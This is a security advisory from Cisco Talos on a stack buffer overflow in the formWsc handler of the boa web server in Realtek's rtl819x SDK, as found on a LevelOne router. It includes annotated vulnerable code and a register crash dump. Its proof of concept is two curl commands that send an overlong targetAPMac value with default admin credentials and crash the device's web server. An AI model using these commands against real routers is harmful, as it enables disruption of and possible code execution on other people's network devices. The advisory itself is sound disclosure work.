Talos IntelligenceTALOS-2023-1904Realtek rtl819x Jungle SDK boa formWsc stack-based buffer overflow vulnerability
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
17.4%
Talos Vulnerability Report
TALOS-2023-1904
Realtek rtl819x Jungle SDK boa formWsc stack-based buffer overflow vulnerability
July 8, 2024
CVE Number
CVE-2023-49867
SUMMARY
A stack-based buffer overflow vulnerability exists in the boa formWsc functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11
PRODUCT URLS
rtl819x Jungle SDK - <https://www.realtek.com/en/> WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103>
CVSSv3 SCORE
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-121 - Stack-based Buffer Overflow
DETAILS
The rtl819x Jungle SDK is an SDK for routers. This SDK uses as web server boa.
This Realtek rtl819x Jungle SDK vulnerability was found while researching the Levelone WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.
The WBR-6013 router has a web server called boa. The version used in the device is that of a Realtek SDK that uses boa. One of the SDKβs API is /boafrm/formWsc. This API allows modifications of the Wi-Fi WPS settings. The function responsible for this API is boaβs formWsc:
void formWsc(request *wp, char *path, char *query)
{
[1] targetAPMac = req_get_cstream_var(wp, "targetAPMac", (""));
[...]
strVal = req_get_cstream_var(wp, ("triggerPIN"), "");
if (strVal[0]) {
int local_pin_changed = 0;
[...]
[2] apmib_get(MIB_WLAN_WSC_DISABLE, (void *)&intVal);
if (intVal) {
[...]
}
else {
if (local_pin_changed) {
[...]
}
else {
if(targetAPMac[0]){
unsigned char targetAPMacFilter[20];
int idx = 0;
int idx2 = 0;
[3] for(idx;idx<strlen(targetAPMac);idx++){
if( _is_hex(targetAPMac[idx])){
[4] targetAPMacFilter[idx2]=targetAPMac[idx];
idx2++;
}
}
targetAPMacFilter[idx2]='\0';
[...]
}
[...]
}
[...]
}
[...]
}
[...]
}
At [1] the targetAPMac requestβs parameter is fetched in the targetAPMac variable. Then, if the triggerPIN requestβs parameter is provided and has a value different than the empty string, the code at [2] is reached. At [2] the MIB_WLAN_WSC_DISABLE flash entry is fetched. If its value is 0, meaning that the WPS is enabled, assuming the targetAPMac variable has a value different than the empty string, then the code at [3] is reached. At [3] a for loop is executed where each character of targetAPMac is checked using the _is_hex function. If _is_hex returns true, the character is copied into the targetAPMacFilter stack buffer. Essentially, the for loop copies only the hexadecimal characters from targetAPMac into targetAPMacFilter.
Because no checks are performed on the size of the targetAPMac requestβs parameter, a buffer overflow can occur at [4] in the stack buffer targetAPMacFilter, possibly leading to arbitrary code execution.
Crash Information
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ registers ββββ
$zero: 0x00000000 β 0x00000000
$at : 0xfffffff8 β 0xfffffff8
$v0 : 0x00000071 β 0x00000071
$v1 : 0x000008a1 β 0x000008a1
$a0 : 0x004c5db4 β 0x6578742f β 0x6578742f ("ext/"?)
$a1 : 0x407ffb9d β 0x00203220 β 0x00203220
$a2 : 0x00000000 β 0x00000000
$a3 : 0x00000000 β 0x00000000
$t0 : 0x0000003e β 0x0000003e
$t1 : 0xbf8004d4 β 0xbf8004d4
$t2 : 0x00000002 β 0x00000002
$t3 : 0x00000200 β 0x00000200
$t4 : 0x00000100 β 0x00000100
$t5 : 0x00000807 β 0x00000807
$t6 : 0x00000800 β 0x00000800
$t7 : 0x004b0000 β 0x004b0000
$s0 : 0x41414141 β 0x41414141 ("AAAA"?)
$s1 : 0x41414141 β 0x41414141 ("AAAA"?)
$s2 : 0x41414141 β 0x41414141 ("AAAA"?)
$s3 : 0x41414141 β 0x41414141 ("AAAA"?)
$s4 : 0x41414141 β 0x41414141 ("AAAA"?)
$s5 : 0x41414141 β 0x41414141 ("AAAA"?)
$s6 : 0x41414141 β 0x41414141 ("AAAA"?)
$s7 : 0x0044975c β 0x666f726d β 0x666f726d ("form"?)
$t8 : 0x004b56c0 β 0x3ff44400 β 0x28c80008 β 0x28c80008
$t9 : 0x3ff44400 β 0x28c80008 β 0x28c80008
$k0 : 0x00000000 β 0x00000000
$k1 : 0x00000000 β 0x00000000
$s8 : 0x0000005c β 0x0000005c
$pc : 0x41414141 β 0x41414141 ("AAAA"?)
$sp : 0x40800550 β 0x41414141 β 0x41414141 ("AAAA"?)
$hi : 0x000000c9 β 0x000000c9
$lo : 0x0003c754 β 0x0003c754
$fir : 0x00739300 β 0x00739300
$ra : 0x41414141 β 0x41414141 ("AAAA"?)
$gp : 0x3ff875c0 β 0x6c5f636f β 0x6c5f636f ("l_co"?)
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ stack ββββ
0x40800550β+0x0000: 0x41414141 β 0x41414141 β $sp
0x40800554β+0x0004: 0x41414141 β 0x41414141
0x40800558β+0x0008: 0x41414141 β 0x41414141
0x4080055cβ+0x000c: 0x41414141 β 0x41414141
0x40800560β+0x0010: 0x41414141 β 0x41414141
0x40800564β+0x0014: 0x41414141 β 0x41414141
0x40800568β+0x0018: 0x41414141 β 0x41414141
0x4080056cβ+0x001c: 0x41414141 β 0x41414141
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ code:mips:MIPS32 ββββ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ threads ββββ
[#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV
Exploit Proof of Concept
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/wlwps.htm &>/dev/null
After this request it is possible to use the /boafrm/formWsc API:
curl -d "submit-url=POC&triggerPIN=1&targetAPMac=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formWsc
Assuming the WPS functionality is enabled, after the request, the boa process will crash. The POC uses the default admin credentials.
VENDOR RESPONSE
Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.
TIMELINE
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release
Credit
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2023-1903
Previous Report
TALOS-2023-1899
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
17.4%